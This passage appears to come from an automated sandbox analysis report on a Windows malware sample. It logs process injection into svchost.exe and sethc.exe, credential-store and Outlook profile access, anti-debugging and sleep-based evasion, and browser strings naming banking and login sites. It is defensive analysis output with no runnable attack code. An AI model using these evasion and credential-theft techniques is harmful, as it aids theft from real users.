                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\sethc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ek8LkB2Cgo.exeStatic file information: File size 1229824 > 1048576
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ek8LkB2Cgo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: sethc.pdbGCTL source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RlKZsaoEJNpD.exe, 00000005.00000000.1468541461.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp, RlKZsaoEJNpD.exe, 00000007.00000000.1632177564.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sethc.pdb source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
                Source: ek8LkB2Cgo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ek8LkB2Cgo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ek8LkB2Cgo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ek8LkB2Cgo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ek8LkB2Cgo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050E01E LoadLibraryA,GetProcAddress,0_2_0050E01E
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00516B05 push ecx; ret 0_2_00516B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041504A push edx; retf 2_2_0041504D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B05D push 7EE3812Dh; retf 2_2_0040B062
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041502C push esp; ret 2_2_0041503C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403830 push eax; ret 2_2_00403832
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041889B pushfd ; ret 2_2_004188A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D99E push eax; retf 2_2_0040D9A1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB46 pushad ; iretd 2_2_0040DB6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414BF2 push 00000067h; ret 2_2_00414C87
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418B87 push 6666FE1Ah; iretd 2_2_00418B8C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041939C push ss; retf 2_2_004193FA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC21 push eax; retf 2_2_0040DC22
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041ACC2 pushad ; iretd 2_2_0041ACCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414621 push ebx; retn 8A14h2_2_00414671
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147C3 push eax; ret 2_2_00414852
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320225F pushad ; ret 2_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032027FA pushad ; ret 2_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320283D push eax; iretd 2_2_03202858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320135E push eax; iretd 2_2_03201369
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BF09AD push ecx; mov dword ptr [esp], ecx6_2_04BF09B6
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9C39F push FFFFFFB9h; ret 6_2_00C9C3AA
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9244E push esp; iretd 6_2_00C9244F
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9266E push ebp; ret 6_2_00C9266F
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C95068 pushfd ; ret 6_2_00C95070
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CA1235 push esp; retf 6_2_00CA1238
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C95354 push 6666FE1Ah; iretd 6_2_00C95359
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9748F pushad ; iretd 6_2_00C97498
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C917F9 push esp; ret 6_2_00C91809
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C8782A push 7EE3812Dh; retf 6_2_00C8782F
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9DB4A push ebp; retf 6_2_00C9DB62
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00558111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00558111
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0050EB42
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0051123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0051123A
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeAPI/Special instruction interceptor: Address: 15F85AC
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                Source: C:\Windows\SysWOW64\sethc.exeWindow / User API: threadDelayed 4802Jump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeWindow / User API: threadDelayed 5171Jump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeEvaded block: after key decisiongraph_0-93251
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94035
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\sethc.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\sethc.exe TID: 8108Thread sleep count: 4802 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sethc.exe TID: 8108Thread sleep time: -9604000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exe TID: 8108Thread sleep count: 5171 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sethc.exe TID: 8108Thread sleep time: -10342000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sethc.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00536CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00536CA9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_005360DD
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_005363F9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0053EB60
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053F56F FindFirstFileW,FindClose,0_2_0053F56F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0053F5FA
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00541B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00541B2F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00541C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00541C8A
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00541F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00541F94
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9C670 FindFirstFileW,FindNextFileW,FindClose,6_2_00C9C670
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0050DDC0
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 3MZ6696O.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 3MZ6696O.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 3MZ6696O.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 3MZ6696O.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 3MZ6696O.6.drBinary or memory string: discord.comVMware20,11696492231f
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777472925.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1872544120.00000110069BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: sethc.exe, 00000006.00000002.3780922348.0000000007EAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492
                Source: 3MZ6696O.6.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 3MZ6696O.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 3MZ6696O.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 3MZ6696O.6.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 3MZ6696O.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 3MZ6696O.6.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 3MZ6696O.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 3MZ6696O.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: sethc.exe, 00000006.00000002.3780922348.0000000007EAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: smartscreen_scanned_downloads_counterINTEGERInteractive Brokers - HKVMware20,11696492231]
                Source: 3MZ6696O.6.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 3MZ6696O.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 3MZ6696O.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeAPI call chain: ExitProcess graph end nodegraph_0-92907
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E63 LdrLoadDll,2_2_00417E63
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546AAF BlockInput,0_2_00546AAF
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004F3D19
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00523920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00523920
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050E01E LoadLibraryA,GetProcAddress,0_2_0050E01E
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F71B8 mov eax, dword ptr fs:[00000030h]0_2_015F71B8
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F8878 mov eax, dword ptr fs:[00000030h]0_2_015F8878
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F8818 mov eax, dword ptr fs:[00000030h]0_2_015F8818
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
